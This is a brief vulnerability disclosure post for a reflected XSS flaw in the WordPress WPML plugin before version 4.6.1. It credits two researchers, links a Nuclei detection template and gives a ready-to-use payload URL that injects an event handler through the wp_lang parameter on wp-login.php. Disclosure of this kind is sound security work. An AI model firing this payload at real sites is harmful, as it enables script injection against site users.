Awesome

WordPress Plugin WPML Version < 4.6.1 RXSS vulnerability

Found by :- @bug_vs_me and @falcon_charan on 13th MArch 2023

Nuclei template:- https://github.com/bug-vs-me/nuclei/blob/main/wpml.yaml

and payload:- https://xxxxxxx/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c